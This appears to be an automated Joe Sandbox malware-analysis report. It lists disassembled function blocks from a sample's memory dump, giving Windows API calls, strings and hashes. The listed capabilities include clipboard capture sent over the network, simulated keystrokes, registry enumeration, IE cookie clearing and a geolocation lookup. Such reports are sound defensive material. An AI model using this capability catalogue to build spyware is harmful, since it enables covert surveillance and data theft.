                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                                                                                                                                                                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                                                                                                                • API String ID: 37874593-703403762
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                                                                                                                                                                                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00449B37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00449B40
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00449B65
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dc07b2b70d5d15ed1bcd67b1f24feaf136ebd40b623740e78a86a330a3ab3b56
                                                                                                                                                                                                                                                                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc07b2b70d5d15ed1bcd67b1f24feaf136ebd40b623740e78a86a330a3ab3b56
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendInput.USER32 ref: 00418B08
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InputSend$Virtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1167301434-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                                                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2172192267-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                                                                                                                                                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00447EBC
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00447EE0
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00448233
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f2632b67193357a83db75d9b5d73d353fce2e4dc276e18d9d86292fc31d1611
                                                                                                                                                                                                                                                                                                • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f2632b67193357a83db75d9b5d73d353fce2e4dc276e18d9d86292fc31d1611
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00444086
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044409D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004440BC
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004440D7
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004440EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID: J7D
                                                                                                                                                                                                                                                                                                • API String ID: 3033488037-1677391033
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                                                                                                                                                                                                                                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                                                • String ID: HE$HE
                                                                                                                                                                                                                                                                                                • API String ID: 269201875-1978648262
                                                                                                                                                                                                                                                                                                • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                                                                                                • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                                                                                                                                                                • API String ID: 3114080316-344394840
                                                                                                                                                                                                                                                                                                • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                                                                                                                                                                                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                                                                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                                                                                                                                • API String ID: 1133728706-4073444585
                                                                                                                                                                                                                                                                                                • Opcode ID: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                                                                                                                                                                                                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: baa808ce9aba2e31bda6eba52dd091397fabc77087c94bec0579852e2f8fce8d
                                                                                                                                                                                                                                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baa808ce9aba2e31bda6eba52dd091397fabc77087c94bec0579852e2f8fce8d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                                                                                • String ID: P[G
                                                                                                                                                                                                                                                                                                • API String ID: 2536120697-571123470
                                                                                                                                                                                                                                                                                                • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                                                                                                                                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                                                                                • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                                                                                                                                                                                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FD29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
